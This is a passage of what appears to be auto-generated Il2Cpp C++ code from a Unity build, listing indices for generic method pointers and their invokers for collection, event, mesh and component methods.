417/*(Il2CppMethodPointer)&U3CCreateWhereIteratorU3Ec__Iterator1D_1_System_Collections_IEnumerable_GetEnumerator_m3279674866_gshared*/, 4/*4*/}, { 442, 418/*(Il2CppMethodPointer)&U3CCreateWhereIteratorU3Ec__Iterator1D_1_System_Collections_Generic_IEnumerableU3CTSourceU3E_GetEnumerator_m2682676065_gshared*/, 4/*4*/}, { 443, 419/*(Il2CppMethodPointer)&U3CCreateWhereIteratorU3Ec__Iterator1D_1_MoveNext_m3533253043_gshared*/, 43/*43*/}, { 444, 420/*(Il2CppMethodPointer)&U3CCreateWhereIteratorU3Ec__Iterator1D_1_Dispose_m1879652802_gshared*/, 0/*0*/}, { 445, 421/*(Il2CppMethodPointer)&U3CCreateWhereIteratorU3Ec__Iterator1D_1_Reset_m1773515612_gshared*/, 0/*0*/}, { 446, 422/*(Il2CppMethodPointer)&Action_2__ctor_m3362391082_gshared*/, 211/*211*/}, { 447, 423/*(Il2CppMethodPointer)&Action_2_Invoke_m1501152969_gshared*/, 8/*8*/}, { 448, 424/*(Il2CppMethodPointer)&Action_2_BeginInvoke_m1914861552_gshared*/, 114/*114*/}, { 449, 425/*(Il2CppMethodPointer)&Action_2_EndInvoke_m3956733788_gshared*/, 90/*90*/}, { 450, 426/*(Il2CppMethodPointer)&Func_2__ctor_m1684831714_gshared*/, 211/*211*/}, { 451, 427/*(Il2CppMethodPointer)&Func_2_Invoke_m3288232740_gshared*/, 40/*40*/}, { 452, 428/*(Il2CppMethodPointer)&Func_2_BeginInvoke_m4034295761_gshared*/, 113/*113*/}, { 453, 429/*(Il2CppMethodPointer)&Func_2_EndInvoke_m1674435418_gshared*/, 40/*40*/}, { 454, 430/*(Il2CppMethodPointer)&Func_3__ctor_m3917225629_gshared*/, 211/*211*/}, { 455, 431/*(Il2CppMethodPointer)&Func_3_Invoke_m1588676556_gshared*/, 9/*9*/}, { 456, 432/*(Il2CppMethodPointer)&Func_3_BeginInvoke_m3007306193_gshared*/, 114/*114*/}, { 457, 433/*(Il2CppMethodPointer)&Func_3_EndInvoke_m917241105_gshared*/, 40/*40*/}, { 458, 434/*(Il2CppMethodPointer)&ScriptableObject_CreateInstance_TisRuntimeObject_m3534259992_gshared*/, 4/*4*/}, { 459, 435/*(Il2CppMethodPointer)&Component_GetComponent_TisRuntimeObject_m2724124387_gshared*/, 4/*4*/}, { 460, 436/*(Il2CppMethodPointer)&Component_GetComponentInChildren_TisRuntimeObject_m2461586036_gshared*/, 4/*4*/}, { 461, 437/*(Il2CppMethodPointer)&Component_GetComponentInChildren_TisRuntimeObject_m2958738264_gshared*/, 226/*226*/}, { 462, 438/*(Il2CppMethodPointer)&Component_GetComponentsInChildren_TisRuntimeObject_m2050767461_gshared*/, 226/*226*/}, { 463, 439/*(Il2CppMethodPointer)&Component_GetComponentsInChildren_TisRuntimeObject_m1699854702_gshared*/, 292/*292*/}, { 464, 440/*(Il2CppMethodPointer)&Component_GetComponentsInChildren_TisRuntimeObject_m3978412804_gshared*/, 4/*4*/}, { 465, 441/*(Il2CppMethodPointer)&Component_GetComponentsInChildren_TisRuntimeObject_m1992201622_gshared*/, 90/*90*/}, { 466, 442/*(Il2CppMethodPointer)&Component_GetComponentInParent_TisRuntimeObject_m2509612665_gshared*/, 4/*4*/}, { 467, 443/*(Il2CppMethodPointer)&Component_GetComponentsInParent_TisRuntimeObject_m1689132204_gshared*/, 292/*292*/}, { 468, 444/*(Il2CppMethodPointer)&Component_GetComponents_TisRuntimeObject_m1186222966_gshared*/, 90/*90*/}, { 469, 445/*(Il2CppMethodPointer)&Component_GetComponents_TisRuntimeObject_m3998315035_gshared*/, 4/*4*/}, { 470, 446/*(Il2CppMethodPointer)&GameObject_GetComponent_TisRuntimeObject_m2812611596_gshared*/, 4/*4*/}, { 471, 447/*(Il2CppMethodPointer)&GameObject_GetComponentInChildren_TisRuntimeObject_m327292296_gshared*/, 4/*4*/}, { 472, 448/*(Il2CppMethodPointer)&GameObject_GetComponentInChildren_TisRuntimeObject_m785321398_gshared*/, 226/*226*/}, { 473, 449/*(Il2CppMethodPointer)&GameObject_GetComponents_TisRuntimeObject_m4101660272_gshared*/, 4/*4*/}, { 474, 450/*(Il2CppMethodPointer)&GameObject_GetComponents_TisRuntimeObject_m157115873_gshared*/, 90/*90*/}, { 475, 451/*(Il2CppMethodPointer)&GameObject_GetComponentsInChildren_TisRuntimeObject_m3906671769_gshared*/, 226/*226*/}, { 476, 452/*(Il2CppMethodPointer)&GameObject_GetComponentsInChildren_TisRuntimeObject_m1817409138_gshared*/, 292/*292*/}, { 477, 453/*(Il2CppMethodPointer)&GameObject_GetComponentsInParent_TisRuntimeObject_m3757051886_gshared*/, 292/*292*/}, { 478, 454/*(Il2CppMethodPointer)&GameObject_AddComponent_TisRuntimeObject_m3813873105_gshared*/, 4/*4*/}, { 479, 455/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisRuntimeObject_m1712366139_gshared*/, 190/*190*/}, { 480, 456/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisRuntimeObject_m1123530241_gshared*/, 97/*97*/}, { 481, 457/*(Il2CppMethodPointer)&Mesh_SafeLength_TisRuntimeObject_m3530173620_gshared*/, 5/*5*/}, { 482, 458/*(Il2CppMethodPointer)&Mesh_SetArrayForChannel_TisRuntimeObject_m937821222_gshared*/, 187/*187*/}, { 483, 459/*(Il2CppMethodPointer)&Mesh_SetListForChannel_TisRuntimeObject_m550022115_gshared*/, 1208/*1208*/}, { 484, 460/*(Il2CppMethodPointer)&Mesh_SetListForChannel_TisRuntimeObject_m1809194193_gshared*/, 187/*187*/}, { 485, 461/*(Il2CppMethodPointer)&Mesh_SetUvsImpl_TisRuntimeObject_m3176745153_gshared*/, 626/*626*/}, { 486, 462/*(Il2CppMethodPointer)&Resources_ConvertObjects_TisRuntimeObject_m1607107295_gshared*/, 40/*40*/}, { 487, 463/*(Il2CppMethodPointer)&Resources_GetBuiltinResource_TisRuntimeObject_m1023501484_gshared*/, 40/*40*/}, { 488, 464/*(Il2CppMethodPointer)&Object_Instantiate_TisRuntimeObject_m447919519_gshared*/, 40/*40*/}, { 489, 465/*(Il2CppMethodPointer)&Object_Instantiate_TisRuntimeObject_m3829784634_gshared*/, 871/*871*/}, { 490, 466/*(Il2CppMethodPointer)&Object_FindObjectsOfType_TisRuntimeObject_m1140156812_gshared*/, 4/*4*/}, { 491, 467/*(Il2CppMethodPointer)&Object_FindObjectOfType_TisRuntimeObject_m483057723_gshared*/, 4/*4*/}, { 492, 468/*(Il2CppMethodPointer)&PlayableHandle_IsPlayableOfType_TisRuntimeObject_m3778531616_AdjustorThunk*/, 43/*43*/}, { 493, 469/*(Il2CppMethodPointer)&AttributeHelperEngine_GetCustomAttributeOfType_TisRuntimeObject_m2532320824_gshared*/, 40/*40*/}, { 494, 470/*(Il2CppMethodPointer)&BaseInvokableCall_ThrowOnInvalidArg_TisRuntimeObject_m2527568643_gshared*/, 90/*90*/}, { 495, 471/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m1438267254_gshared*/, 8/*8*/}, { 496, 472/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m3532025692_gshared*/, 90/*90*/}, { 497, 473/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m2453159155_gshared*/, 90/*90*/}, { 498, 474/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m1748003978_gshared*/, 90/*90*/}, { 499, 475/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m2747063431_gshared*/, 90/*90*/}, { 500, 476/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m3983863716_gshared*/, 90/*90*/}, { 501, 477/*(Il2CppMethodPointer)&InvokableCall_1_Find_m2337296995_gshared*/, 2/*2*/}, { 502, 478/*(Il2CppMethodPointer)&InvokableCall_2__ctor_m1562911263_gshared*/, 8/*8*/}, { 503, 479/*(Il2CppMethodPointer)&InvokableCall_2_Invoke_m3224908080_gshared*/, 90/*90*/}, { 504, 480/*(Il2CppMethodPointer)&InvokableCall_2_Find_m490443702_gshared*/, 2/*2*/}, { 505, 481/*(Il2CppMethodPointer)&InvokableCall_3__ctor_m4270240248_gshared*/, 8/*8*/}, { 506, 482/*(Il2CppMethodPointer)&InvokableCall_3_Invoke_m2530072389_gshared*/, 90/*90*/}, { 507, 483/*(Il2CppMethodPointer)&InvokableCall_3_Find_m1268604653_gshared*/, 2/*2*/}, { 508, 484/*(Il2CppMethodPointer)&InvokableCall_4__ctor_m2170162585_gshared*/, 8/*8*/}, { 509, 485/*(Il2CppMethodPointer)&InvokableCall_4_Invoke_m1140294390_gshared*/, 90/*90*/}, { 510, 486/*(Il2CppMethodPointer)&InvokableCall_4_Find_m2012236736_gshared*/, 2/*2*/}, { 511, 487/*(Il2CppMethodPointer)&CachedInvokableCall_1__ctor_m142520746_gshared*/, 206/*206*/}, { 512, 488/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m4256098179_gshared*/, 90/*90*/}, { 513, 489/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m3431029003_gshared*/, 90/*90*/}, { 514, 490/*(Il2CppMethodPointer)&UnityAction_1__ctor_m2462078051_gshared*/, 211/*211*/}, { 515, 491/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m3449959460_gshared*/, 90/*90*/}, { 516, 492/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m171921212_gshared*/, 113/*113*/}, { 517, 493/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m4263282057_gshared*/, 90/*90*/}, { 518, 494/*(Il2CppMethodPointer)&UnityEvent_1__ctor_m1689184037_gshared*/, 0/*0*/}, { 519, 495/*(Il2CppMethodPointer)&UnityEvent_1_AddListener_m4113187159_gshared*/, 90/*90*/}, { 520, 496/*(Il2CppMethodPointer)&UnityEvent_1_RemoveListener_m2092327996_gshared*/, 90/*90*/}, { 521, 497/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m3444788956_gshared*/, 9/*9*/}, { 522, 498/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1293546544_gshared*/, 9/*9*/}, { 523, 499/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m698775905_gshared*/, 40/*40*/}, { 524, 500/*(Il2CppMethodPointer)&UnityEvent_1_Invoke_m1599856953_gshared*/, 90/*90*/}, { 525, 501/*(Il2CppMethodPointer)&UnityAction_2__ctor_m279959196_gshared*/, 211/*211*/}, { 526, 502/*(Il2CppMethodPointer)&UnityAction_2_Invoke_m3084457267_gshared*/, 8/*8*/}, { 527, 503/*(Il2CppMethodPointer)&UnityAction_2_BeginInvoke_m1618060250_gshared*/, 114/*114*/}, { 528, 504/*(Il2CppMethodPointer)&UnityAction_2_EndInvoke_m2945489174_gshared*/, 90/*90*/}, { 529, 505/*(Il2CppMethodPointer)&UnityEvent_2__ctor_m2946696812_gshared*/, 0/*0*/}, { 530, 506/*(Il2CppMethodPointer)&UnityEvent_2_FindMethod_Impl_m3138010017_gshared*/, 9/*9*/}, { 531, 507/*(Il2CppMethodPointer)&UnityEvent_2_GetDelegate_m1819680197_gshared*/, 9/*9*/}, { 532, 508/*(Il2CppMethodPointer)&UnityAction_3__ctor_m686468321_gshared*/, 211/*211*/}, { 533, 509/*(Il2CppMethodPointer)&UnityAction_3_Invoke_m1025098032_gshared*/, 206/*206*/}, { 534, 510/*(Il2CppMethodPointer)&UnityAction_3_BeginInvoke_m2306880617_gshared*/, 1209/*1209*/}, { 535, 511/*(Il2CppMethodPointer)&UnityAction_3_EndInvoke_m1442592523_gshared*/, 90/*90*/}, { 536, 512/*(Il2CppMethodPointer)&UnityEvent_3__ctor_m1438768687_gshared*/, 0/*0*/}, { 537, 513/*(Il2CppMethodPointer)&UnityEvent_3_FindMethod_Impl_m2694035610_gshared*/, 9/*9*/}, { 538, 514/*(Il2CppMethodPointer)&UnityEvent_3_GetDelegate_m3857474734_gshared*/, 9/*9*/}, { 539, 515/*(Il2CppMethodPointer)&UnityAction_4__ctor_m2895008802_gshared*/, 211/*211*/}, { 540, 516/*(Il2CppMethodPointer)&UnityAction_4_Invoke_m4286618750_gshared*/, 671/*671*/}, { 541, 517/*(Il2CppMethodPointer)&UnityAction_4_BeginInvoke_m2401124591_gshared*/, 683/*683*/}, { 542, 518/*(Il2CppMethodPointer)&UnityAction_4_EndInvoke_m3699273616_gshared*/, 90/*90*/}, { 543, 519/*(Il2CppMethodPointer)&UnityEvent_4__ctor_m1179807734_gshared*/, 0/*0*/}, { 544, 520/*(Il2CppMethodPointer)&UnityEvent_4_FindMethod_Impl_m4045008607_gshared*/, 9/*9*/}, { 545, 521/*(Il2CppMethodPointer)&UnityEvent_4_GetDelegate_m1290309059_gshared*/, 9/*9*/}, { 546, 522/*(Il2CppMethodPointer)&ExecuteEvents_ValidateEventData_TisRuntimeObject_m3838331218_gshared*/, 40/*40*/}, { 547, 523/*(Il2CppMethodPointer)&ExecuteEvents_Execute_TisRuntimeObject_m4168308247_gshared*/, 408/*408*/}, { 548, 524/*(Il2CppMethodPointer)&ExecuteEvents_ExecuteHierarchy_TisRuntimeObject_m2541874163_gshared*/, 113/*113*/}, { 549, 525/*(Il2CppMethodPointer)&ExecuteEvents_ShouldSendToComponent_TisRuntimeObject_m2998351876_gshared*/, 1/*1*/}, { 550, 526/*(Il2CppMethodPointer)&ExecuteEvents_GetEventList_TisRuntimeObject_m2127453215_gshared*/, 8/*8*/}, { 551, 527/*(Il2CppMethodPointer)&ExecuteEvents_CanHandleEvent_TisRuntimeObject_m1201779629_gshared*/, 1/*1*/}, { 552, 528/*(Il2CppMethodPointer)&ExecuteEvents_GetEventHandler_TisRuntimeObject_m3333041576_gshared*/, 40/*40*/}, { 553, 529/*(Il2CppMethodPointer)&EventFunction_1__ctor_m814090495_gshared*/, 211/*211*/}, { 554, 530/*(Il2CppMethodPointer)&EventFunction_1_Invoke_m2378823590_gshared*/, 8/*8*/}, { 555, 531/*(Il2CppMethodPointer)&EventFunction_1_BeginInvoke_m3064802067_gshared*/, 114/*114*/}, { 556, 532/*(Il2CppMethodPointer)&EventFunction_1_EndInvoke_m1238672169_gshared*/, 90/*90*/}, { 557, 533/*(Il2CppMethodPointer)&Dropdown_GetOrAddComponent_TisRuntimeObject_m2875934266_gshared*/, 40/*40*/}, { 558, 534/*(Il2CppMethodPointer)&SetPropertyUtility_SetClass_TisRuntimeObject_m3524554928_gshared*/, 1210/*1210*/}, { 559, 535/*(Il2CppMethodPointer)&LayoutGroup_SetProperty_TisRuntimeObject_m1703476175_gshared*/, 1211/*1211*/}, { 560, 536/*(Il2CppMethodPointer)&IndexedSet_1_get_Count_m2839545138_gshared*/, 3/*3*/}, { 561, 537/*(Il2CppMethodPointer)&IndexedSet_1_get_IsReadOnly_m1571858531_gshared*/, 43/*43*/}, { 562, 538/*(Il2CppMethodPointer)&IndexedSet_1_get_Item_m2560856298_gshared*/, 97/*97*/}, { 563, 539/*(Il2CppMethodPointer)&IndexedSet_1_set_Item_m3923255859_gshared*/, 187/*187*/}, { 564, 540/*(Il2CppMethodPointer)&IndexedSet_1__ctor_m2689707074_gshared*/, 0/*0*/}, { 565, 541/*(Il2CppMethodPointer)&IndexedSet_1_Add_m4044765907_gshared*/, 90/*90*/}, { 566, 542/*(Il2CppMethodPointer)&IndexedSet_1_AddUnique_m3246859944_gshared*/, 1/*1*/}, { 567, 543/*(Il2CppMethodPointer)&IndexedSet_1_Remove_m2685638878_gshared*/, 1/*1*/}, { 568, 544/*(Il2CppMethodPointer)&IndexedSet_1_GetEnumerator_m3646001838_gshared*/, 4/*4*/}, { 569, 545/*(Il2CppMethodPointer)&IndexedSet_1_System_Collections_IEnumerable_GetEnumerator_m3582353431_gshared*/, 4/*4*/}, { 570, 546/*(Il2CppMethodPointer)&IndexedSet_1_Clear_m2776064367_gshared*/, 0/*0*/}, { 571, 547/*(Il2CppMethodPointer)&IndexedSet_1_Contains_m4188067325_gshared*/, 1/*1*/}, { 572, 548/*(Il2CppMethodPointer)&IndexedSet_1_CopyTo_m91125111_gshared*/, 86/*86*/}, { 573, 549/*(Il2CppMethodPointer)&IndexedSet_1_IndexOf_m783474971_gshared*/, 5/*5*/}, { 574, 550/*(Il2CppMethodPointer)&IndexedSet_1_Insert_m676465416_gshared*/, 187/*187*/}, { 575, 551/*(Il2CppMethodPointer)&IndexedSet_1_RemoveAt_m2714142196_gshared*/, 42/*42*/}, { 576, 552/*(Il2CppMethodPointer)&IndexedSet_1_RemoveAll_m2736534958_gshared*/, 90/*90*/}, { 577, 553/*(Il2CppMethodPointer)&IndexedSet_1_Sort_m2938181397_gshared*/, 90/*90*/}, { 578, 554/*(Il2CppMethodPointer)&ListPool_1_Get_m529219189_gshared*/, 4/*4*/}, { 579, 555/*(Il2CppMethodPointer)&ListPool_1_Release_m1464559125_gshared*/, 90/*90*/}, { 580, 556/*(Il2CppMethodPointer)&ListPool_1__cctor_m1613652121_gshared*/, 0/*0*/}, { 581, 557/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m441310157_gshared*/, 90/*90*/}, { 582, 558/*(Il2CppMethodPointer)&ObjectPool_1_get_countAll_m4217365918_gshared*/, 3/*3*/}, { 583, 559/*(Il2CppMethodPointer)&ObjectPool_1_set_countAll_m1742773675_gshared*/, 42/*42*/}, { 584, 560/*(Il2CppMethodPointer)&ObjectPool_1_get_countActive_m2655657865_gshared*/, 3/*3*/}, { 585, 561/*(Il2CppMethodPointer)&ObjectPool_1_get_countInactive_m763736764_gshared*/, 3/*3*/}, { 586, 562/*(Il2CppMethodPointer)&ObjectPool_1__ctor_m1532275833_gshared*/, 8/*8*/}, { 587, 563/*(Il2CppMethodPointer)&ObjectPool_1_Get_m3724675538_gshared*/, 4/*4*/}, { 588, 564/*(Il2CppMethodPointer)&ObjectPool_1_Release_m1615270002_gshared*/, 90/*90*/}, { 889, 497/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m3444788956_gshared*/, 9/*9*/}, { 890, 498/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1293546544_gshared*/, 9/*9*/}, { 891, 565/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m2391748163_gshared*/, 9/*9*/}, { 892, 566/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m2559549291_gshared*/, 9/*9*/}, { 893, 497/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m3444788956_gshared*/, 9/*9*/}, { 894, 498/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1293546544_gshared*/, 9/*9*/}, { 895, 567/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m693454196_gshared*/, 9/*9*/}, { 896, 568/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m3917909024_gshared*/, 9/*9*/}, { 897, 569/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m1973251419_gshared*/, 9/*9*/}, { 898, 570/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m3445199159_gshared*/, 9/*9*/}, { 899, 497/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m3444788956_gshared*/, 9/*9*/}, { 900, 498/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1293546544_gshared*/, 9/*9*/}, { 901, 571/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m1317195241_gshared*/, 9/*9*/}, { 902, 572/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1399250761_gshared*/, 9/*9*/}, { 903, 573/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m2583796848_gshared*/, 9/*9*/}, { 904, 574/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1805195420_gshared*/, 9/*9*/}, { 905, 497/*(Il2CppMethodPointer)&UnityEvent_1_FindMethod_Impl_m3444788956_gshared*/, 9/*9*/}, { 906, 498/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1293546544_gshared*/, 9/*9*/}, { 907, 575/*(Il2CppMethodPointer)&Dictionary_2__ctor_m3043033341_gshared*/, 42/*42*/}, { 908, 576/*(Il2CppMethodPointer)&Dictionary_2_Add_m790520409_gshared*/, 86/*86*/}, { 909, 577/*(Il2CppMethodPointer)&Dictionary_2_TryGetValue_m2330758874_gshared*/, 38/*38*/}, { 910, 578/*(Il2CppMethodPointer)&GenericComparer_1__ctor_m474482338_gshared*/, 0/*0*/}, { 911, 579/*(Il2CppMethodPointer)&GenericEqualityComparer_1__ctor_m603915962_gshared*/, 0/*0*/}, { 912, 580/*(Il2CppMethodPointer)&GenericComparer_1__ctor_m4106585959_gshared*/, 0/*0*/}, { 913, 581/*(Il2CppMethodPointer)&GenericEqualityComparer_1__ctor_m2311357775_gshared*/, 0/*0*/}, { 914, 582/*(Il2CppMethodPointer)&Nullable_1__ctor_m796575255_AdjustorThunk*/, 410/*410*/}, { 915, 583/*(Il2CppMethodPointer)&Nullable_1_get_HasValue_m3663286555_AdjustorThunk*/, 43/*43*/}, { 916, 584/*(Il2CppMethodPointer)&Nullable_1_get_Value_m1743067844_AdjustorThunk*/, 321/*321*/}, { 917, 585/*(Il2CppMethodPointer)&GenericComparer_1__ctor_m3575096182_gshared*/, 0/*0*/}, { 918, 586/*(Il2CppMethodPointer)&GenericEqualityComparer_1__ctor_m2595781006_gshared*/, 0/*0*/}, { 919, 49/*(Il2CppMethodPointer)&Array_AsReadOnly_TisRuntimeObject_m1721559766_gshared*/, 40/*40*/}, { 920, 41/*(Il2CppMethodPointer)&Array_IndexOf_TisRuntimeObject_m2032877681_gshared*/, 28/*28*/}, { 921, 587/*(Il2CppMethodPointer)&CustomAttributeData_UnboxValues_TisCustomAttributeTypedArgument_t1498197914_m2561215702_gshared*/, 40/*40*/}, { 922, 588/*(Il2CppMethodPointer)&Array_AsReadOnly_TisCustomAttributeTypedArgument_t1498197914_m2855930084_gshared*/, 40/*40*/}, { 923, 589/*(Il2CppMethodPointer)&CustomAttributeData_UnboxValues_TisCustomAttributeNamedArgument_t94157543_m2789115353_gshared*/, 40/*40*/}, { 924, 590/*(Il2CppMethodPointer)&Array_AsReadOnly_TisCustomAttributeNamedArgument_t94157543_m2935638619_gshared*/, 40/*40*/}, { 925, 207/*(Il2CppMethodPointer)&List_1__ctor_m136460305_gshared*/, 42/*42*/}, { 926, 206/*(Il2CppMethodPointer)&List_1__ctor_m310736118_gshared*/, 0/*0*/}, { 927, 203/*(Il2CppMethodPointer)&List_1_get_Count_m2375293942_gshared*/, 3/*3*/}, { 928, 217/*(Il2CppMethodPointer)&List_1_Add_m4157722533_gshared*/, 90/*90*/}, { 929, 241/*(Il2CppMethodPointer)&List_1_ToArray_m546658539_gshared*/, 4/*4*/}, { 930, 591/*(Il2CppMethodPointer)&GenericComparer_1__ctor_m221205314_gshared*/, 0/*0*/}, { 931, 592/*(Il2CppMethodPointer)&GenericEqualityComparer_1__ctor_m1269284954_gshared*/, 0/*0*/}, { 932, 593/*(Il2CppMethodPointer)&Dictionary_2__ctor_m3313899087_gshared*/, 90/*90*/}, { 933, 594/*(Il2CppMethodPointer)&Dictionary_2_Add_m3435012856_gshared*/, 228/*228*/}, { 934, 595/*(Il2CppMethodPointer)&Array_BinarySearch_TisInt32_t2071877448_m1538339240_gshared*/, 107/*107*/}, { 935, 329/*(Il2CppMethodPointer)&Action_1_Invoke_m4180501989_gshared*/, 90/*90*/}, { 936, 364/*(Il2CppMethodPointer)&Stack_1__ctor_m1041657164_gshared*/, 0/*0*/}, { 937, 370/*(Il2CppMethodPointer)&Stack_1_Push_m1129365869_gshared*/, 90/*90*/}, { 938, 369/*(Il2CppMethodPointer)&Stack_1_Pop_m1289567471_gshared*/, 4/*4*/}, { 939, 363/*(Il2CppMethodPointer)&Stack_1_get_Count_m4101767244_gshared*/, 3/*3*/}, { 940, 206/*(Il2CppMethodPointer)&List_1__ctor_m310736118_gshared*/, 0/*0*/}, { 941, 217/*(Il2CppMethodPointer)&List_1_Add_m4157722533_gshared*/, 90/*90*/}, { 942, 241/*(Il2CppMethodPointer)&List_1_ToArray_m546658539_gshared*/, 4/*4*/}, { 943, 469/*(Il2CppMethodPointer)&AttributeHelperEngine_GetCustomAttributeOfType_TisRuntimeObject_m2532320824_gshared*/, 40/*40*/}, { 944, 596/*(Il2CppMethodPointer)&Dictionary_2_TryGetValue_m4224556700_gshared*/, 1212/*1212*/}, { 945, 597/*(Il2CppMethodPointer)&Dictionary_2__ctor_m2049292515_gshared*/, 0/*0*/}, { 946, 206/*(Il2CppMethodPointer)&List_1__ctor_m310736118_gshared*/, 0/*0*/}, { 947, 217/*(Il2CppMethodPointer)&List_1_Add_m4157722533_gshared*/, 90/*90*/}, { 948, 204/*(Il2CppMethodPointer)&List_1_get_Item_m2062981835_gshared*/, 97/*97*/}, { 949, 203/*(Il2CppMethodPointer)&List_1_get_Count_m2375293942_gshared*/, 3/*3*/}, { 950, 224/*(Il2CppMethodPointer)&List_1_Contains_m1658838094_gshared*/, 1/*1*/}, { 951, 340/*(Il2CppMethodPointer)&Predicate_1__ctor_m2289454599_gshared*/, 211/*211*/}, { 952, 236/*(Il2CppMethodPointer)&List_1_RemoveAll_m1569860525_gshared*/, 5/*5*/}, { 953, 223/*(Il2CppMethodPointer)&List_1_Clear_m4254626809_gshared*/, 0/*0*/}, { 954, 221/*(Il2CppMethodPointer)&List_1_AddRange_m3537433232_gshared*/, 90/*90*/}, { 955, 598/*(Il2CppMethodPointer)&CachedInvokableCall_1__ctor_m3889269781_gshared*/, 1213/*1213*/}, { 956, 599/*(Il2CppMethodPointer)&CachedInvokableCall_1__ctor_m2681398733_gshared*/, 122/*122*/}, { 957, 487/*(Il2CppMethodPointer)&CachedInvokableCall_1__ctor_m142520746_gshared*/, 206/*206*/}, { 958, 600/*(Il2CppMethodPointer)&CachedInvokableCall_1__ctor_m2137801147_gshared*/, 290/*290*/}, { 959, 206/*(Il2CppMethodPointer)&List_1__ctor_m310736118_gshared*/, 0/*0*/}, { 960, 229/*(Il2CppMethodPointer)&List_1_GetEnumerator_m2837081829_gshared*/, 1202/*1202*/}, { 961, 244/*(Il2CppMethodPointer)&Enumerator_get_Current_m2577424081_AdjustorThunk*/, 4/*4*/}, { 962, 249/*(Il2CppMethodPointer)&Enumerator_MoveNext_m44995089_AdjustorThunk*/, 43/*43*/}, { 963, 247/*(Il2CppMethodPointer)&Enumerator_Dispose_m3736175406_AdjustorThunk*/, 0/*0*/}, { 964, 601/*(Il2CppMethodPointer)&Mesh_SafeLength_TisInt32_t2071877448_m3760170319_gshared*/, 5/*5*/}, { 965, 602/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisVector3_t2243707580_m3989967866_gshared*/, 97/*97*/}, { 966, 603/*(Il2CppMethodPointer)&Mesh_SetArrayForChannel_TisVector3_t2243707580_m943427249_gshared*/, 187/*187*/}, { 967, 604/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisVector4_t2243707581_m1048536121_gshared*/, 97/*97*/}, { 968, 605/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisVector2_t2243707579_m2289935163_gshared*/, 97/*97*/}, { 969, 606/*(Il2CppMethodPointer)&Mesh_GetAllocArrayFromChannel_TisColor32_t874517518_m859642474_gshared*/, 190/*190*/}, { 970, 607/*(Il2CppMethodPointer)&Mesh_SetListForChannel_TisVector3_t2243707580_m2854368686_gshared*/, 187/*187*/}, { 971, 608/*(Il2CppMethodPointer)&Mesh_SetListForChannel_TisVector4_t2243707581_m1760927057_gshared*/, 187/*187*/}, { 972, 609/*(Il2CppMethodPointer)&Mesh_SetListForChannel_TisColor32_t874517518_m4104974134_gshared*/, 1208/*1208*/}, { 973, 610/*(Il2CppMethodPointer)&Mesh_SetUvsImpl_TisVector2_t2243707579_m2513165067_gshared*/, 626/*626*/}, { 974, 611/*(Il2CppMethodPointer)&List_1__ctor_m1063228628_gshared*/, 0/*0*/}, { 975, 434/*(Il2CppMethodPointer)&ScriptableObject_CreateInstance_TisRuntimeObject_m3534259992_gshared*/, 4/*4*/}, { 976, 612/*(Il2CppMethodPointer)&List_1_Add_m2241268440_gshared*/, 42/*42*/}, { 977, 613/*(Il2CppMethodPointer)&UnityEvent_1_Invoke_m646962604_gshared*/, 42/*42*/}, { 978, 206/*(Il2CppMethodPointer)&List_1__ctor_m310736118_gshared*/, 0/*0*/}, { 979, 614/*(Il2CppMethodPointer)&Func_2__ctor_m1354888807_gshared*/, 211/*211*/}, { 980, 412/*(Il2CppMethodPointer)&Enumerable_Where_TisRuntimeObject_m1140705402_gshared*/, 9/*9*/}, { 981, 411/*(Il2CppMethodPointer)&Enumerable_Any_TisRuntimeObject_m32651785_gshared*/, 1/*1*/}, { 982, 500/*(Il2CppMethodPointer)&UnityEvent_1_Invoke_m1599856953_gshared*/, 90/*90*/}, { 983, 615/*(Il2CppMethodPointer)&UnityEvent_1__ctor_m333010934_gshared*/, 0/*0*/}, { 984, 494/*(Il2CppMethodPointer)&UnityEvent_1__ctor_m1689184037_gshared*/, 0/*0*/}, { 985, 616/*(Il2CppMethodPointer)&UnityAction_2_Invoke_m319876726_gshared*/, 885/*885*/}, { 986, 617/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m3979091955_gshared*/, 886/*886*/}, { 987, 618/*(Il2CppMethodPointer)&UnityAction_2_Invoke_m676868403_gshared*/, 887/*887*/}, { 988, 435/*(Il2CppMethodPointer)&Component_GetComponent_TisRuntimeObject_m2724124387_gshared*/, 4/*4*/}, { 989, 